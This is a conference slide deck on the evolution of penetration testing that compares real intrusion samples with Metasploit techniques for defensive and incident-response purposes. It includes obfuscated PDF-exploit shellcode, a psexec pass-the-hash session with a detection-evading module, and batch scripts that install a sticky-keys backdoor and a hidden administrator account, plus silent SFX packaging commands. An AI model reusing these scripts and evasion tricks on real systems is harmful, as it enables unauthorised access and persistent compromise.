11

Evolution of PenTesting

22

Introduction

• Name: Russ Gideon

• Title: Director of Malware Research

• Contact: rgideon@attackresearch.com

• Twitter: @gideonsecurity

• Background:

– Led numerous Red Teams

– Foreign attack profiling and reverse engineering

– Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing

33

Evolution

• What is this talk?

– A dissection of real world attacks and some of its

affects on penetration testing.

– Reflection on real offensive operators vs

penetration testers

– Conclusions are derived from mainly a

forensics/binary analysis perspective

• What this talk is not!

– A slam on current penetration testing tools!

44

Evolution

• 1960s discussions about Time Sharing

computers being vulnerable

– RAND Corporation

– NSA

• Coined the term “penetration” for this

• Evolved into Tiger Teams

• From a historical perspective influential

people in this

– Willis Ware

55

The Birth Of an Industry

Industry realized we need to

behave like attackers to learn

how to defend against them

Henceforth the industry we

all know and love is born

66

Evolution Of an Industry

• Industry gets bigger

• Tools become a commodity

• Attackers evolved and changed tactics

– Employed varying degrees of malware

– Deception

– Leverage protocol and design flaws

– Evasion and anti-analysis techniques

• The industry tools also evolved, but not in the

same manner

77

Memory corruption == $$$

• Tools become commodity

• The shift begins

• Attackers are closed source and don’t release

88

We Make Strange Bedfellows

99

Offensive Operators

1010

Why do we call it APT?

• “APT” != Advanced

• Clever != Advanced

• Attackers work as hard as they have to but not

any harder

– As we step up the defense game they have to

work harder

– Currently that game is not too difficult (in most

places)

1111

Outline

• Getting In

• APT Lateral Movement vs Pentesters Lateral

Movement

• Staging The Attack

1212

Getting In – Spear Phishing

1313

Getting In

• Example

– CVE 2010-2883

• Stack-based buffer overflow in CoolType.dll

• Very popular for targeted spear phishing

• 22 unique samples with this exploit in them

– 7 of these samples are made with metasploit’s module for this

– Case study

• Targeted Attack With a PDF

– D4169301AFBC86A04135EBC4A6A4BAD.pdf

1414

Getting In

• Metasploit has a great module for 2010-2883

• If a host isn’t vulnerable then it will drop and

open a clean “Hello World” PDF

1515

Getting In

• D4169301AFBC86A04135EBC4A6A4BADB.pdf

• Includes this data stream

• Look familiar?

1616

Getting In

• The shellcode is the only significant difference

between the “APT” sample and a general

metasploit created PDF

1717

Getting In

WjozzFaiSj = unescape

var nXzaRHPbywaqAbGpGx0t0zGkvQWhu =

“\x25\x754141\x25\x754141%63a5%u4a80\0x25

snip….. 0x75fa65%uec10%u0937%ufb0c%ufd97…….snip

…%ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uae

f2"

18

Using MSF DEP/ASLR Bypass

seg000:00000136 db 84hseg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6hseg000:0000013A db 80h ; seg000:0000013B db 4Ahseg000:0000013C db 0FFhseg000:0000013D db 0FFhseg000:0000013E db 0FFhseg000:0000013F db 0FFhseg000:00000140 db 0FFhseg000:00000141 db 0FFhseg000:00000142 db 0FFhseg000:00000143 db 0FFhseg000:00000144 db 0FFhseg000:00000145 db 0FFhseg000:00000146 db 0FFhseg000:00000147 db 0FFhseg000:00000148 db 0seg000:00000149 db 10hseg000:0000014A db 0seg000:0000014B db 0

seg000:00000136 db 84hseg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6hseg000:0000013A db 80h ; seg000:0000013B db 4Ahseg000:0000013C db 0FFhseg000:0000013D db 0FFhseg000:0000013E db 0FFhseg000:0000013F db 0FFhseg000:00000140 db 0FFhseg000:00000141 db 0FFhseg000:00000142 db 0FFhseg000:00000143 db 0FFhseg000:00000144 db 0FFhseg000:00000145 db 0FFhseg000:00000146 db 0FFhseg000:00000147 db 0FFhseg000:00000148 db 0seg000:00000149 db 10hseg000:0000014A db 0seg000:0000014B db 0

MSF Created PDF APT Created PDF with MSF

19

Side Note

• The original sample from contagio– Dropper is igfxver.exe

– AV family of Chifrax

• D4169301AFBC86A04135EBC4A6A4BADB.pdf– Dropper is AcroRd32.exe in temp

– %TEMP%\AcroRd32.exe drops and starts

• rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11

– AV Family of Protux

– Delivered ~2 weeks later

2020

Getting In Conclusion

• Pen Tester: SingTable CoolType DLL Overflow MSF Module with PDF dropper. – Not a white hat based disclosure

– Originally found in a targeted campaign

• http://contagiodump.blogspot.com/search/label/CVE-2010-2883

• Attacker: Rip off MSF Module

– This attack used the metasploit module

– Change out shellcode

• Added obfuscation

• Verdict: Attacker rips off another attackers tactic and makes it better

2121

Outline

• Getting In

• APT Lateral Movement vs Pen Testers Lateral

Movement

• Staging The Attack

2222

Lateral Movement

2323

APT Lateral Movement

• Case Study:

a1765a7f3376c76d8c23766a92f1cb6b.exe

– Nps.exe

• Sample from IR we conducted

• In a nutshell their own PSEXEC for shoveling

shells

2424

Lateral Movement

• General flow of the sample

– From controlling node

• Execute: nps.exe –install $Victim NPServer

• Drops nps.exe on \\victim\Admin$\system32

• Creates a service around nps.exe (named NPServer) on

remote server and starts it

• Named pipes created on victim host and used for

communications

– NPStdin

– NPStdout

2525

Lateral Movment

• Based upon arguments it is a service binary or

drops the communication piece on the remote

host

2626

Lateral Movement

• Dropper to the victim

2727

Lateral Movement

• Remote Named pipes for all communications

Controlling host

Victim Host

2828

Lateral Movement

• Taking advantage of credential authorization

• Of course won’t work in all situations

– Account needs to have administrative privileges

– Vista and up

• Credentials have to be domain based

• Local administrative credentials can’t write to C$ and

Admin$

2929

Forensic Evidence

3030

Forensic Evidence

3131

Pen Testers Forensic Evidence

• Metasploit has the same capability with

PSEXEC

• General flow

– Pushes service executable with payload to

\\victim\Admin$\system32

– Uses DCERPC to create a service around the

service binary on victim host

– Starts the service on the victim

– Uses payload defined variables for communication

3232

Pen Testers Forensic Evidence

3333

Pen Testers Forensic Evidence

3434

Usage

3535

Usage• msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

SMBDomain WORKGROUP no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

3636

Major Differences!

• NPS.exe usage screen. Shows flexibility to alter

your forensic evidence

• Metasploit doesn’t have this capability

• Derives its service name and display name

from 2 pieces of code in the module

– Service name generation looks like

• servicename = rand_text_alpha(8)

– Display name generation looks like:

• displayname = 'M' + rand_text_alpha(rand(32)+1)

3737

Major Differences

• Not Blending in!

– rand_text_alpha(8)

– 'M' + rand_text_alpha(rand(32)+1)

3838

Lateral Movement Solution

• A few lines added to the psexec module and

we have some flexibility now

– Register two new options

• SVCName

– The Service name you want to use. This will be what is left

over in the registry under HKLM\CurrentControlSet\services if

the service is not cleaned up

• DisplayName

– This is the display name of the service that will show up in the

event logs

3939

Lateral Movement Solution

• psexec_ar optionsmsf exploit(psexec_ar) > set DisplayName NPServer

msf exploit(psexec_ar) > set RHOST victim

msf exploit(psexec_ar) > set SMBDomain ""

msf exploit(psexec_ar) > set SMBUser Administrator

msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586

msf exploit(psexec_ar) > set SVCName NPServer

msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe

msf exploit(psexec_ar) > set EXE::Custom mycustom.exe

msf exploit(psexec_ar) > exploit

4040

Lateral Movement Solution

4141

Lateral Movement Solution

Available on GitHub

https://github.com/AttackResearch/Metasploit/blob/master/modules/exploits/psexec_ar.rb

4242

Lateral Movement Conclusion

• Pen Tester: MSF Psexec module

– Randomized service names

– Obvious “badness”

– Very loud

• Attacker: Custom psexec type functionality

– Blend in and look normal

– Uses named pipes for communication

– Very basic backdoor that still isn't caught by AV

• Verdict: Superior attacker technique, less likely to get caught

4343

Outline

• Getting In

• APT Lateral Movement vs Pen Testers Lateral

Movement

• Staging The Attack

4444

Staging The Attack

4545

Staging The Attack

• Automation is the key

• Humans make mistakes

• Automate the post exploitation

– Sounds “advanced” doesn’t it?

4646

Why Raise The Bar?

• Found on various C2 hosts and on the victims

– MM.exe

• Simple automation of their attack

– Helps them for speed

– Helps us with being able know how they will

operate in environments next time

• Rar files aren’t just for exfiltration

4747

Why Raise The Bar?

• Dissection of mm.exe

– Self executing rar file

– Drops 2.bat and mm.exe in C:\Temp

– C:\Temp\mm.exe isn’t the same as the original

mm.exe

• New mm.exe

• Another UPX packed SFX

– Drops 22.bat and net1.exe in C:\Temp

4848

Why Raise The Bar?

• 2.bat

copy %windir%\explorer.exe %windir%\system32\explorer1.exe

copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe

copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe

copy c:\temp\mm.exe %windir%\system32\magnify1.exe

del %windir%\system32\sethc.exe

del %windir%\system32\magnify.exe

c:

cd %windir%\system32\

ren explorer1.exe sethc.exe

ren magnify1.exe magnify.exe

4949

Why Raise The Bar?

• 22.bat

• Now they have

c:\temp\net1.exe user syslem$ /active:y

c:\temp\net1.exe user SYSLEM$ qazwsx!@#123

c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add

c:\temp\net1.exe localgroup Administrators syslem$ /add

Persistence Communications

5050

Before and After

5151

Why Raise The Bar?

• Build the SFX RAR file

– Rar.exe a -sfxDefault.sfx -zsettings.conf mm2.exe

mm.exe 2.bat

;The comment below contains SFX script commands

Path=C:\Temp\

SavePath

Overwrite=1

Silent=1

Setup=2.bat

Settings.conf

5252

Why Raise The Bar?

• Build the SFX RAR file

– Rar.exe a -sfxDefault.sfx –zsettings1.conf mm.exe

C:\Windows\System32\net1.exe 22.bat

;The comment below contains SFX script commands

Path=C:\Temp\

SavePath

Overwrite=1

Silent=1

Setup=22.bat

Settings1.conf

5353

Staging The Attack Conclusion

• Pen Tester: Possible MSF Module

– There really isn’t a tool comparison

– Make a metasploit module for this?

– Working harder than have to?

• Attacker: Attack Process is Automated

– No need for a complex framework

– Works into attackers tool set

– Leverage system resources and that is it

• Verdict: Attacker technique is simple and effective. Doesn’t work harder than has to

5454

Conclusions

• Every attack (and group/person) has its

characteristics as do pen testers

• The objectives of a pen tester are usually

much different than an nation state operator

or black hat

– Pen tests have a tone of constraints

– Pen testers are there to test for vulnerabilities

• Which is needed

– This is not testing the system as a whole

• How does your system react to a true compromise

5555

Conclusions

• Testing the system as whole

– Targeted attacks affect the whole system

– Penetration testing really just looks for vulnerabilities

• We have corrupted the term “penetration tests”

– Pen Test = 20K cheap scan and assessment

• Attack Modeling and Simulations aren’t the same as a our current definition of penetration tests

5656

Attack Simulations and Modeling

• Testing the system as whole:

– Monitoring

– Triage process

– Incident Response process

• Your operations and your vendors

– Business con-ops

– Disaster recovery

• If you pull the plug on your network you are in disaster

recovery!

5757

Attack Simulations: Case Study

5858

Attack Simulations

• What’s the difference between a fire inspector and a fireman?

• Fire inspectors are hired to => Inspect

– Exit lights are working

– Fire alarms are working

– Fire extinguishers are up to par

• Fireman are hired to => Respond

– Fires

– Medical emergencies

– Large scale disasters

5959

Attack Simulations• Do not have your incident response capability behave

as fire inspectors

• They are needed to respond not inspect

• We must start training the IR capability – More than just penetration testing of them

• What are firemen doing while they are “down”?– Training

• Is your IR team technically capable of handling an incident– Revere Engineering

– PCAP Analysis

– Log mining

• Does the business know how to use them

6060

Attack Simulations

• You might not be ready for a full stress test of your environment

• Engage someone that has done this work and see what they can do.

• More than likely there is a lot they can do with and for you

– Testing your NOC/IR Ops

– Testing your detection tools/capabilities

– Modeling attacker workflows and how it relates to your data

6161

Questions?